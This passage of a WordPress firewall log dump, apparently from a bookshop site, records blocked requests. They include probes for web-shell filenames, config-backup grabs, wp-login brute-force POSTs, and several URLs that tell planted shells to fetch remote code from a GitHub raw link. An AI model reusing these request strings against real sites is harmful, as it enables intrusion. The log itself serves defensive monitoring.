10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','2kon0We3iZ9xRalH86IyAOM1',0,1636915666.9292,118,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','MfCSoz9ETXeJ2rcQ1yAnqBGD',0,1636915667.2349,391,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/sh3ll.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ka4VLt6XcluR1H3wvqSFNB5O',0,1636915667.7715,130,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/c99.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','7zBFlmpaG31UDWKTnq2PeoOw',0,1636915668.0933,377,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/alexuse.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','wTBClaM5qicb9DJ7SGQkEPHI',0,1636915668.6153,134,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/w.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','eMCwcITkNmrZXL4OPH0dgqj1',0,1636915668.8958,124,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/ws.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','kEloL26nvAuSCarm4xP3IdOJ',0,1636915669.1925,410,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/2.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','C9cOvB0AeuXfU4TGwryx5n67',0,1636915669.7822,137,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/lol.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','N2o0gy3UKSIznTmHBRJYGdqk',0,1636915670.2259,393,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/87.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','qxPWo1YbL0J6ywegOaX4jd5R',0,1636915670.7772,123,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/7yn.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','xEWsmqidIJZFXgDf8Nnk9AO2',0,1636915671.0504,378,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/haxor.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','0ZfQIdK5EF9OktmYR61zJiHw',0,1636915671.5925,120,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/403.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ZLIl6E2acwNofhM4PUs3KHkF',0,1636915671.9247,128,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/13.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','3GJKZNiFvEefacB6TylLzXO8',0,1636915672.1801,382,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/cpanel.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','nmgRB1Kxiz9WkP2NwuAYpOS0',0,1636915672.7210,141,'','GET',403,0,700,0,1,'',0),('169.60.78.94',2839301726,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/58.0.3029.110 Safari\\/537.36\"}','fQLeKcH1ow02kmVOs8WFB5XI',0,1636916019.3723,1157,'','POST',403,0,600,0,1,'',0),('23.146.241.20',395505940,'','https://www.ashbooks.co.uk/haders.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\"}','yczj8kHZ5LfiqDasNBmExdC6',0,1636916808.9991,400,'','GET',403,0,700,0,1,'',0),('23.146.241.20',395505940,'','https://www.ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"python-requests\\/2.26.0\"}','3a6NEuskCI21vogp5yAFT80j',0,1636916810.1480,412,'','GET',403,0,700,0,1,'',0),('23.146.241.20',395505940,'','https://www.ashbooks.co.uk/wp-content/plugins/backup_index.php','','{\"1\":\"python-requests\\/2.26.0\"}','VWav8hS15PwzKLHlZXkEjynA',0,1636916811.3763,383,'','GET',403,0,700,0,1,'',0),('23.146.241.20',395505940,'','https://www.ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','CtxOw6K8FQVZqnedINMmlvPh',0,1636916812.6874,422,'','GET',403,0,700,0,1,'',0),('23.146.241.20',395505940,'','https://www.ashbooks.co.uk/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149\"}','LHrIwCZq2lOzJAmEVMBSYD8e',0,1636916814.0222,396,'','GET',403,0,700,0,1,'',0),('23.146.241.20',395505940,'','https://www.ashbooks.co.uk/style.php?sig=beima&domain=anonymousfox.net&shell_file=qcivlupzkrs&file_name=/fox-style.php','','{\"1\":\"python-requests\\/2.26.0\"}','kgPiASI6f9CbnRJmXuWtLs3r',0,1636916815.1597,407,'','GET',403,0,700,0,1,'',0),('23.146.241.20',395505940,'','https://www.ashbooks.co.uk/wp-includes/wpconfig.bak.php?act=sf','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','vcu6oWPEa4VzpCdTeGULIZ5Q',0,1636916816.4274,407,'','GET',403,0,700,0,1,'',0),('23.146.241.20',395505940,'','https://www.ashbooks.co.uk/old-index.php','','{\"1\":\"python-requests\\/2.26.0\"}','qGpwAFoC3SQ4e8H76RVvakzO',0,1636916817.8199,395,'','GET',403,0,700,0,1,'',0),('23.146.241.20',395505940,'','https://www.ashbooks.co.uk/magic-old-index.php','','{\"1\":\"python-requests\\/2.26.0\"}','RIj3PeMhiXwKr2ayqsEcN9Qk',0,1636916818.9104,158,'','GET',403,0,700,0,1,'',0),('23.146.241.20',395505940,'','https://www.ashbooks.co.uk/upload.php','','{\"1\":\"python-requests\\/2.26.0\"}','gAm8qUaWStv1Ph3cTJQduV9K',0,1636916819.6872,374,'','GET',403,0,700,0,1,'',0),('23.146.241.20',395505940,'','https://www.ashbooks.co.uk/wp-content/langar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','IwHPxs7EYGTcuS3r6aoMZlqn',0,1636916821.0425,430,'','GET',403,0,700,0,1,'',0),('23.146.241.20',395505940,'','https://www.ashbooks.co.uk/test.php?Ghost=send','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\"}','b1w9ZPU7AIrBXj0ndC3keHNf',0,1636916822.3483,394,'','GET',403,0,700,0,1,'',0),('23.146.241.20',395505940,'','https://www.ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\"}','j2AsKlqTi8fPxcZJerUzCduQ',0,1636916823.4584,384,'','GET',403,0,700,0,1,'',0),('23.146.241.20',395505940,'','https://www.ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','aE8Gjsw1mOpcH5qxhlYr4UFD',0,1636916824.4123,378,'','GET',403,0,700,0,1,'',0),('23.146.241.20',395505940,'','https://www.ashbooks.co.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/95.0.4638.69 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','QKuAjvNDgBTtqirbFERpk14y',0,1636916825.5657,394,'','GET',403,0,700,0,1,'',0),('23.146.241.20',395505940,'','https://www.ashbooks.co.uk/wp-includes/lfx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\"}','lavK3ZDIB8XRNMizhwyqeLJC',0,1636916826.7054,386,'','GET',403,0,700,0,1,'',0),('23.146.241.20',395505940,'','https://www.ashbooks.co.uk/wp-booking.php','','{\"1\":\"python-requests\\/2.26.0\"}','XBjFCxLTr0NH5qEv1PlVdsay',0,1636916827.6893,384,'','GET',403,0,700,0,1,'',0),('23.146.241.20',395505940,'','https://www.ashbooks.co.uk/wp-booking.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','tkx3i4WcCb79seMgJU16z8nr',0,1636916828.4111,386,'','GET',403,0,700,0,1,'',0),('93.104.211.150',1567150998,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','WBesUSjINGoH3pcx9LTiRlvy',0,1636918275.9590,447,'','POST',403,0,600,0,1,'',0),('208.113.160.8',3497107464,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','jEiPefbK6Cot0ZUG5uQ2sSBc',0,1636919012.0000,584,'','POST',403,0,600,0,1,'',0),('20.93.115.97',341668705,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','UjQtI0na9FMELiHbW4XSwlpG',0,1636919458.6433,2312,'','GET',403,0,520,0,1,'',0),('136.144.210.23',2291192343,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','okFBTAInq8xcV7tzhDZLvb91',0,1636919799.5425,2261,'','POST',403,0,600,0,1,'',0),('199.116.78.158',3346288286,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','Z1JtxWcHhOLAwqkbegNoYF9V',0,1636920634.5064,1725,'','POST',403,0,600,0,1,'',0),('23.94.120.151',392067223,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','sgTb8QYo4FfKXcHUxVzajrl3',0,1636921418.6908,3136,'','POST',403,0,600,0,1,'',0),('173.236.184.125',2917972093,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','FQkRvyaSA4L10wos7Ymtnp9j',0,1636922166.0880,1373,'','POST',403,0,600,0,1,'',0),('173.212.235.115',2916412275,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.109 Safari\\/537.36\"}','mlBhNi9zGtwpcfUJSXToYunO',0,1636922904.5487,488,'','POST',403,0,600,0,1,'',0),('103.121.89.72',1736005960,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','6mDF2crhYyjRJWdVSwosf1lq',0,1636923649.1378,639,'','POST',403,0,600,0,1,'',0),('202.172.26.53',3400276533,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','bT8fCSI0uEMZdPjO4rtmgiYL',0,1636924399.5858,519,'','POST',403,0,600,0,1,'',0),('109.87.200.193',1834469569,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.97 Safari\\/537.36\"}','sC5o0xQLaWr1JkjMc2deTzBE',0,1636925063.9533,534,'','POST',403,0,600,0,1,'',0),('45.120.69.121',762856825,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','YhsiovQLwRIWCZkFy5DOeNrM',0,1636925745.0116,610,'','POST',403,0,600,0,1,'',0),('74.208.25.176',1255152048,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','E87uaAVM5qRZ1bjLeUnlr9cB',0,1636926421.1401,558,'','POST',403,0,600,0,1,'',0),('81.88.52.168',1364735144,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\"}','FGxH61noM8Niy3jJphEdbT0Z',0,1636927111.3748,457,'','POST',403,0,600,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','bc1RmDJSMGwLgsAKfBH3zd7n',0,1636927510.7808,578,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','W4g0hj1YuMtyH5aXOdZkVwB2',0,1636927512.4774,348,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','gkcvd7I4iUXF2rf6VDZLREup',0,1636927513.8758,395,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','lhA2VcrjgMYw854KSfCiymGE',0,1636927516.5129,498,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/boom.php?x','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','dGnzNlj9oICDcx3LMAKrb1Up',0,1636927521.7681,401,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-content/plugins/backup_index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ElsD5TZgI93Npw0v2VotmAOb',0,1636927523.1724,622,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-content/db_cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','5uSokCPfm7EtvWQX6pri3FzI',0,1636927524.4949,376,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','yoVn8hr6WLYaFmKBDZStICsd',0,1636927525.9612,477,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','F9L87XZuEoAP46tsdWKgkvnM',0,1636927529.1618,1030,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','VYkNdHJytUQousl0Wma6KLAI',0,1636927531.5093,486,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','O1o8XluidsrY0IgbzCJG96fw',0,1636927533.3735,542,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/alfindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','4qesQ8BTCDxALWf2IMphHkPc',0,1636927534.9469,632,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','MRhAWTNYHkCF3JlbmpOLwGV1',0,1636927536.8119,365,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-booking.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','co1Xw0QZnaUVieAzWgpYvP2K',0,1636927538.2332,479,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/cindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ysaj3FenVDivxho8lWNCREtz',0,1636927540.5660,471,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-content/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','RoJAncOEjhuGe7a1KT8CDFHW',0,1636927542.4232,780,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Tvkem3uHlOw6zgVaAiDS0QL9',0,1636927544.6367,487,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-includes/fonts/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','qC7Mps2weuKVk5LfcT9m3JHO',0,1636927546.8610,472,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','MfJOni1Nodw0mHhZ2YBlgxVI',0,1636927548.8789,487,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','GNnqeCTQzly3uvxwhBoWkVcr',0,1636927551.2789,478,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','xmP15QYFfnrNdLu3CT4RWqXw',0,1636927553.3138,469,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-admin/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','kNiCxf19agIqYRGJb0SBPr7s',0,1636927555.1724,479,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-content/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','RL2dVErKvoTau0Zkjzp8qDCG',0,1636927556.9884,478,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-includes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','1Kr6fgD92qMCt5E8XQ7pjzcV',0,1636927558.7925,490,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-content/themes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','YXW07mxd89142nP6KvSakATH',0,1636927560.7931,411,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-content/plugins/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','8HS4Aqn3PzXUDplMIWGEbxyv',0,1636927562.6091,380,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-includes/css/wp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','gmk5FKa8tIWLPU4Druy2xpcs',0,1636927564.0234,427,'','POST',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-content/plugins/ubh/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','TWHv0KlO47mESyBngVoCD1dI',0,1636927565.7219,411,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-includes/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','8gTfaPzH3NMiGq2A7dteQFKs',0,1636927567.4716,375,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','5rZTKSj7AhDoM98fWHgql2Oi',0,1636927569.2010,392,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/haders.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; 